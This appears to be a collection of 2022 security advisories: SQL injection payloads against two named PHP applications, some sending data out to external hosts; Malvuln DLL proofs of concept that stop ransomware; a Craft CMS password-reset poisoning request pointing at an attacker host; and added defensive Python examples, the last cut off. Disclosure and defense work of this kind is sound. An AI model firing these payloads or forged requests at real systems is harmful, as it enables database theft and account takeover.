<pre><code>## Title: School Dormitory Management 1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 05.09.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Dormitory-Management<br /><br /><br /><br />## Description:<br />The id parameter appears to be vulnerable to SQL injection attacks.<br />A single quote was submitted in the id parameter, and a database error<br />message was returned.<br />Two single quotes were then submitted and the error message disappeared.<br />An attacker can take control of the administrator account and of all<br />other accounts on this system, and can also extract all<br />information stored by this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: id (POST)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: id=2' AND (SELECT 7198 FROM(SELECT<br />COUNT(*),CONCAT(0x716b7a6a71,(SELECT<br />(ELT(7198=7198,1))),0x7170717171,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JPhD<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=2' AND (SELECT 6966 FROM (SELECT(SLEEP(5)))amnS)# UIgv<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Dormitory-Management)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/hd6xo1)<br /><br /><br /></code></pre>
<pre><code>## Title: Travel Management System 1.0 Multiple SQLi<br />## Author: nu11secur1ty<br />## Date: 05.07.2022<br />## Vendor: https://code-projects.org/author/fabian/<br />## Software: https://code-projects.org/travel-management-system-using-php-source-code/<br />## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-28079<br /><br /><br /><br />## Description:<br />The pid, subcatid and catid parameters appear to be vulnerable to SQL<br />injection attacks.<br />The payload '+(select<br />load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+'<br />was submitted in all three parameters.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a hostname on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />An attacker can take control of the administrator account and of all<br />other accounts on this system, and can also extract all<br />information stored by this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: pid (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: pid=12'+(select<br />load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''<br />OR NOT 1485=1485 AND 'nTcz'='nTcz<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: pid=12'+(select<br />load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''<br />OR (SELECT 7369 FROM(SELECT COUNT(*),CONCAT(0x716b767671,(SELECT<br />(ELT(7369=7369,1))),0x717a6b7871,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OIAM'='OIAM<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> 
Payload: pid=12'+(select<br />load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''<br />AND (SELECT 4768 FROM (SELECT(SLEEP(5)))llcY) AND 'EiGX'='EiGX<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 4 columns<br /> Payload: pid=12'+(select<br />load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''<br />UNION ALL SELECT<br />NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b767671,0x5a716d6f4e64696f557a4d784663766d435a634a6d4d434b4b477057454a537a45516d445a77767a,0x717a6b7871),NULL,NULL,NULL#<br />---<br /><br />---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /><br />---<br />Parameter: subcatid (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: subcatid=-4598' OR 9251=9251 AND 'kzhS'='kzhS<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: subcatid=7'+(select<br />load_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+''<br />AND (SELECT 2330 FROM(SELECT COUNT(*),CONCAT(0x717a7a7871,(SELECT<br />(ELT(2330=2330,1))),0x716a6b7a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Qftm'='Qftm<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: subcatid=7'+(select<br />load_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+''<br />AND (SELECT 2506 FROM (SELECT(SLEEP(5)))yVKW) AND 'QRSS'='QRSS<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 4 columns<br /> Payload: subcatid=7'+(select<br />load_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+''<br />UNION ALL SELECT<br 
/>NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a7871,0x4142654745746c4c54786a476756684b7864575669645759754f694d5671586a51506a474a475652,0x716a6b7a71),NULL,NULL,NULL#<br />---<br /><br /><br />----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /><br />---<br />Parameter: catid (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: catid=-9719' OR 2503=2503 AND 'ydxn'='ydxn<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: catid=3'+(select<br />load_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+''<br />AND (SELECT 9602 FROM(SELECT COUNT(*),CONCAT(0x71786b6a71,(SELECT<br />(ELT(9602=9602,1))),0x7170626b71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xPSh'='xPSh<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: catid=3'+(select<br />load_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+''<br />AND (SELECT 1843 FROM (SELECT(SLEEP(5)))XNBw) AND 'KRBS'='KRBS<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 4 columns<br /> Payload: catid=3'+(select<br />load_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+''<br />UNION ALL SELECT<br />NULL,CONCAT(0x71786b6a71,0x62596c6a72746a584a7048484a70435867556a656d6e5a734474725650477853527466545071436a,0x7170626b71),NULL,NULL,NULL#<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/Travel-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/8nroqp)<br /><br /><br /></code></pre>
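The mechanism behind the boolean-based payloads in the two advisories above, as an added example that is not code from the advisories or from the affected applications: a hypothetical category lookup written the way a vulnerable PHP application typically builds its query, next to the parameterized and type-validated forms that close the hole, exercised with the catid payload quoted above against a constructed in-memory SQLite table (the real schema is not on the page, so the table and function names are assumptions).

```python
import sqlite3

# Constructed sample data standing in for the application's category table;
# the advisory does not show the real schema, so this one is hypothetical.
CATEGORIES = [(1, "Beaches"), (2, "Mountains"), (3, "Cities")]

# Boolean-based blind payload quoted in the advisory for the catid parameter.
CATID_PAYLOAD = "-9719' OR 2503=2503 AND 'ydxn'='ydxn"


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE category (catid INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO category VALUES (?, ?)", CATEGORIES)
    return conn


def vulnerable_sql(catid):
    """The statement text the database actually receives when the request
    parameter is pasted into the query: the quote in the payload closes the
    string literal and everything after it becomes live SQL."""
    return f"SELECT catid, name FROM category WHERE catid='{catid}'"


def lookup_vulnerable(catid):
    """String-built query: the pattern every payload on this page relies on.
    With the boolean payload, 'OR 2503=2503 ...' is true for every row."""
    with _connect() as conn:
        return conn.execute(vulnerable_sql(catid)).fetchall()


def lookup_hardened(catid):
    """Bound parameter: the value travels to the engine separately from the
    SQL text and is compared as data, never parsed as syntax."""
    with _connect() as conn:
        return conn.execute(
            "SELECT catid, name FROM category WHERE catid=?", (catid,)
        ).fetchall()


def lookup_validated(catid):
    """Belt and braces: category ids are integers, so reject anything else
    before a query is built at all."""
    try:
        catid_int = int(catid)
    except (TypeError, ValueError):
        return []
    return lookup_hardened(catid_int)


if __name__ == "__main__":
    print(vulnerable_sql(CATID_PAYLOAD))
    print("vulnerable:", lookup_vulnerable(CATID_PAYLOAD))  # every row leaks
    print("hardened:  ", lookup_hardened(CATID_PAYLOAD))    # no row matches
    print("validated: ", lookup_validated(CATID_PAYLOAD))   # rejected up front
```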
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/8ed9a60127aee45336102bf12059a850.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ransom.Petya<br />Vulnerability: Code Execution<br />Description: Petya looks for and loads a DLL named "wow64log.dll" in Windows\System32. Therefore, we can drop our own DLL to intercept and terminate the malware pre-encryption. The exploit DLL will simply display a Win32 API message box and call exit(). The exploit DLL must export the "InterlockedExchange" function or it fails with an error. We do not need to rely on a hash signature or a third-party product; the malware will do the work for us. Endpoint protection systems and/or antivirus can potentially be killed prior to executing the malware, but this method cannot be, as there is nothing to kill: the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: Petya<br />Type: PE32<br />MD5: 8ed9a60127aee45336102bf12059a850<br />Vuln ID: MVID-2022-0591<br />Disclosure: 05/06/2022<br />Video PoC URL: https://www.youtube.com/watch?v=p88FI5lZuRQ<br /><br />Exploit/PoC:<br />1) Compile the following C code as "wow64log.dll" as x64<br />2) Place the DLL in Windows\System32<br />3) Run the malware<br /><br />#include "windows.h"<br />#include "stdlib.h" //exit()<br /><br />//By malvuln <br />//Purpose: Exploit Ransom.Petya<br />//MD5: 8ed9a60127aee45336102bf12059a850<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. 
By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//compile as x64<br />//gcc -c wow64log.c <br />//gcc -shared -o wow64log.dll wow64log.o <br />//DLL must live under Windows\System32 dir<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> exit(0);<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br />extern __declspec(dllexport) WINBASEAPI LONG WINAPI InterlockedExchange (LONG volatile *Target, LONG Value){<br /> exit(1);<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/2aea3b217e6a3d08ef684594192cafc8.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ransom.Cryakl<br />Vulnerability: Code Execution<br />Description: Cryakl looks for and loads a DLL named "wow64log.dll" in Windows\System32. Therefore, we can drop our own DLL to intercept and terminate the malware pre-encryption. The exploit DLL will simply display a Win32 API message box and call exit(). The exploit DLL must export the "InterlockedExchange" function or it fails with an error. We do not need to rely on a hash signature or a third-party product; the malware will do the work for us. Endpoint protection systems and/or antivirus can potentially be killed prior to executing the malware, but this method cannot be, as there is nothing to kill: the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: Cryakl<br />Type: PE32<br />MD5: 2aea3b217e6a3d08ef684594192cafc8<br />Vuln ID: MVID-2022-0590<br />Disclosure: 05/06/2022<br />Video PoC URL: https://www.youtube.com/watch?v=uI7kr8gFTP4<br /><br />Exploit/PoC:<br />1) Compile the following C code as "wow64log.dll" as x64<br />2) Place the DLL in Windows\System32<br />3) Run the malware<br /><br />#include "windows.h"<br />#include "stdlib.h" //exit()<br /><br />//By malvuln <br />//Purpose: Exploit Ransom.Cryakl<br />//MD5: 2aea3b217e6a3d08ef684594192cafc8<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. 
By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//compile as x64<br />//gcc -c wow64log.c <br />//gcc -shared -o wow64log.dll wow64log.o <br />//DLL must live under Windows\System32 dir<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> exit(0);<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br />extern __declspec(dllexport) WINBASEAPI LONG WINAPI InterlockedExchange (LONG volatile *Target, LONG Value){<br /> exit(1);<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/6152709e741c4d5a5d793d35817b4c3d.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Ransom.Radamant<br />Vulnerability: Code Execution<br />Description: Radamant tries to load a DLL named "PROPSYS.dll" and execute a hidden PE file "DirectX.exe" from the AppData\Roaming directory. Therefore, we can drop our own DLL to intercept and terminate the malware pre-encryption. The exploit DLL checks whether the current directory is "C:\Windows\System32"; if not, we grab our own process ID and terminate. We do not need to rely on hash signatures or third-party products; the malware's flaw does the work for us. Endpoint protection systems and/or antivirus can potentially be killed prior to executing the malware, but this method cannot be, as there is nothing to kill: the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. 
All basic tests were conducted successfully in a virtual machine environment.<br />Family: Radamant<br />Type: PE32<br />MD5: 6152709e741c4d5a5d793d35817b4c3d<br />Vuln ID: MVID-2022-0589<br />Disclosure: 05/06/2022<br />Video PoC URL: https://www.youtube.com/watch?v=EToGLoZjR6Q<br /><br />Exploit/PoC:<br />1) Compile the following C code as "PROPSYS.dll" 32bit<br />2) Place the DLL in same directory as the ransomware<br />3) Optional - Hide it: attrib +s +h "PROPSYS.dll"<br />4) Run the malware<br /><br />#include "windows.h"<br />#include "string.h" //strcmp()<br />#include "process.h" //getpid() on MinGW<br /><br />//By malvuln<br />//Purpose: Exploit Radamant<br />//gcc -c PROPSYS.c -m32<br />//gcc -shared -o PROPSYS.dll PROPSYS.o -m32<br />//build without UNICODE defined so that TCHAR is char and strcmp() applies<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> //terminate only when loaded from the malware's directory, not from System32<br /> if(GetCurrentDirectory(MAX_PATH, buf))<br /> if(strcmp("C:\\Windows\\System32", buf) != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> <br /> return TRUE;<br />}<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/209a288c68207d57e0ce6e60ebf60729.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.CryptoLocker<br />Vulnerability: Code Execution<br />Description: CryptoLocker drops a PE file in the AppData\Roaming directory which then tries to load a DLL named "netapi32.dll". Therefore, we can drop our own DLL to intercept and terminate the malware pre-encryption. The exploit DLL checks whether the current directory is "C:\Windows\System32"; if not, we grab our own process ID and terminate. We do not need to rely on hash signatures or third-party products; the malware's flaw does the work for us. Endpoint protection systems and/or antivirus can potentially be killed prior to executing the malware, but this method cannot be, as there is nothing to kill: the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. 
<br />Family: CryptoLocker<br />Type: PE32<br />MD5: 209a288c68207d57e0ce6e60ebf60729<br />Vuln ID: MVID-2022-0588<br />Disclosure: 05/06/2022 <br />Video PoC URL: https://www.youtube.com/watch?v=sAp024n_dSk<br /><br />Exploit/PoC:<br />1) Compile the following C code as "netapi32.dll" 32bit<br />2) Place the DLL in same directory as the ransomware<br />3) Optional - Hide it: attrib +s +h "netapi32.dll"<br />4) Run the malware<br /><br />#include "windows.h"<br />#include "string.h" //strcmp()<br />#include "process.h" //getpid() on MinGW<br /><br />//By malvuln - 5/6/2022<br />//Purpose: Exploit CryptoLocker<br />//gcc -c netapi32.c -m32<br />//gcc -shared -o netapi32.dll netapi32.o -m32<br />//build without UNICODE defined so that TCHAR is char and strcmp() applies<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> //terminate only when loaded from the malware's directory, not from System32<br /> if(GetCurrentDirectory(MAX_PATH, buf))<br /> if(strcmp("C:\\Windows\\System32", buf) != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220505-0 ><br />=======================================================================<br /> title: Password Reset Poisoning Attack<br /> product: Craft CMS<br /> vulnerable version: 3.7.36 and potentially lower<br /> fixed version: none, see workaround by vendor<br /> CVE number: CVE-2022-29933<br /> impact: high<br /> homepage: https://craftcms.com<br /> found: 2022-03-14<br /> by: Sandro Einfeldt (Office Munich)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Craft is a flexible, user-friendly CMS for creating custom digital<br />experiences on the web and beyond.<br /><br />It features:<br /><br />- An intuitive, user-friendly control panel for content creation and<br /> administrative tasks.<br />- A clean-slate approach to content modeling and front-end development<br /> that doesn’t make any assumptions about your content or how it should be<br /> consumed.<br />- A built-in Plugin Store with hundreds of free and commercial plugins,<br /> all just a click away.<br />- A robust framework for module and plugin development.<br />- An active, vibrant community."<br /><br />Source: https://craftcms.com/docs/3.x/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor responded that the vulnerability will not be fixed as a workaround<br />is available.<br /><br />An in-depth security analysis performed by security professionals is highly<br />advised, as the software may be affected by further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Password Reset Poisoning Attack (CVE-2022-29933)<br />The password reset function of the 
Craft CMS backend login page,<br />usually accessible under https://<hostname>/index.php?p=admin/login,<br />is vulnerable to a password reset poisoning attack. An unauthenticated<br />attacker who knows valid email addresses or account names of Craft CMS<br />backend users is able to manipulate the password reset functionality in<br />a way that the registered users of the CMS receive password reset emails<br />containing a malicious password reset link.<br /><br />The link contains valid (secret) tokens in the URL's GET parameters that<br />are necessary to authenticate against the server's password reset function<br />and enable a user who lost or forgot the account's password to reset the<br />password. By manipulating the password reset request, an attacker is able to<br />set an arbitrary hostname in the resulting password reset link. Thereby, the<br />attacker can set the link to point to an attacker-controlled host.<br />If a user clicks on the reset link, the valid reset tokens in the GET<br />parameters will be sent to the attacker's web server and can be<br />extracted from the server logs. The attacker is able to build a valid<br />password reset link by adding the tokens to the general reset link<br />structure:<br /><br />https://<hostname>/index.php?p=admin/set-password&code=<token1>&id=<token2><br /><br />If the attacker calls the filled out URL with a web browser, the<br />attacker will be able to reset the account's password and log in.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Password Reset Poisoning Attack (CVE-2022-29933)<br />First, the attacker needs to browse the following URL:<br /><br />https://<hostname>/index.php?p=admin/login<br /><br />The login mask contains a link "Forgot your password?". Following this<br />link, the attacker gets prompted to submit a valid account name or email<br />address. 
After entering the account name or email address and pressing<br />the "Reset Password" button, the attacker can intercept the resulting<br />HTTP POST request with an intercepting web proxy (e.g. BurpSuite). The<br />intercepted request can then be manipulated before getting forwarded<br />to the server. The attacker needs to add the HTTP header<br /><br />X-Forwarded-Host: <attacker_host><br /><br />where the value is the hostname of the web server under the<br />attacker's control.<br /><br />Manipulated Request:<br />-------------------------------------------------------------------------------<br />POST /index.php?p=admin/actions/users/send-password-reset-email HTTP/1.1<br />Host: <IP><br />X-Forwarded-Host: www.attacker.com<br />[...]<br />Referer: http://<IP>/index.php?p=admin/login<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Registered-Asset-Bundles: ,craft\web\assets\login\[...]<br />X-Registered-Js-Files: ,http://<IP>/cpresources/[...]<br />X-CSRF-Token: c9kEDPROifmFNKSKhght_JgkBgnnk5EfXiH1qHA[...]<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 38<br />Origin: http://<IP><br />Connection: close<br />Cookie: CRAFT_CSRF_TOKEN=[...]<br /><br />loginName=test%40example.com<br />-------------------------------------------------------------------------------<br /><br />The resulting server response indicates that the request has been processed.<br /><br />Response:<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Mon, 14 Mar 2022 08:19:24 GMT<br />[...]<br />X-Powered-By: Craft CMS<br />Content-Length: 16<br />Connection: close<br />Content-Type: application/json; charset=UTF-8<br /><br />{"success":true}<br />-------------------------------------------------------------------------------<br /><br />The user will then receive a malicious password reset email pointing to the<br />hostname that the attacker provided by adding the 
X-Forwarded-Host header.<br /><br />Email:<br />-------------------------------------------------------------------------------<br />Hey Test,<br /><br />To reset your Test Install password, click on this link:<br /><br />http://www.attacker.com/index.php?p=admin/set-password&code=D6HWm7pGpYEt9mb-mPVh4kGzXWZ8ax5u&id=48b9fe48-91c9-430e-baa2-5bdf66c88102<br /><br />If you were not expecting this email, just ignore it.<br />-------------------------------------------------------------------------------<br /><br />If the user is not aware and clicks on the link, the values of the reset tokens<br />"code" and "id" will be sent to the attacker's web server. The attacker is<br />then able to relay the tokens to the original reset endpoint and reset the<br />password.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested and found to be vulnerable:<br />* 3.7.36<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-03-10: Contacting vendor through contact form.<br />2022-03-14: Vendor provides Craft CMS installation for verifying the vulnerability.<br />2022-03-22: SEC Consult provides the vulnerability advisory through contact form.<br />2022-03-23: Vendor responded that there is a hardening measure available.<br />2022-03-31: SEC Consult replied that all installations of the current version<br /> (including the testing instance provided by the vendor) are vulnerable<br /> by default and the vulnerability is implementation-based and results<br /> from bad coding practices.<br />Until 2022-05-02: No answer from vendor.<br />2022-05-03: Set advisory release date to 5th May. Informing vendor about<br /> scheduled advisory release.<br />2022-05-05: Release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor knows about the vulnerability and the resulting risks. 
A possible<br />hardening measure has to be implemented manually and is documented here:<br />https://craftcms.com/knowledge-base/securing-craft#explicitly-set-the-web-alias-for-the-site<br />https://craftcms.com/docs/3.x/sites.html#site-url<br /><br />The vendor responded that the vulnerability will not be fixed as a workaround<br />is available.<br /><br /><br />Workaround:<br />-----------<br />The backend login interface and the password reset function should not be<br />accessible from the internet or from any unknown IP addresses. The user<br />must implement the workaround described in the hardening guide above in order<br />to mitigate this issue.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. 
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF S. Einfeldt / @2022<br /><br /></code></pre>
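The host-derivation flaw the SEC Consult advisory describes, as an added example that is not Craft CMS code: a hypothetical reset-link builder that honours X-Forwarded-Host, the hardened form that builds the link from an explicitly configured site URL instead (the approach the vendor's hardening guide prescribes), and a log-side check that flags the tampered header on the manipulated request shown above. CONFIGURED_SITE_URL, the function names and the header dictionary are assumptions; the tokens are the ones from the advisory's sample email.

```python
from urllib.parse import urlencode, urlsplit

# Hypothetical explicitly configured site URL, the equivalent of the site URL /
# @web alias the advisory's hardening guide tells Craft admins to set.
CONFIGURED_SITE_URL = "https://cms.example.org"

# Headers taken from the advisory's manipulated request (constructed dict;
# "<IP>" is the placeholder the advisory itself uses for the real host).
POISONED_REQUEST_HEADERS = {
    "Host": "<IP>",
    "X-Forwarded-Host": "www.attacker.com",
    "Referer": "http://<IP>/index.php?p=admin/login",
}

RESET_ENDPOINT = "admin/set-password"


def _reset_query(code, user_id):
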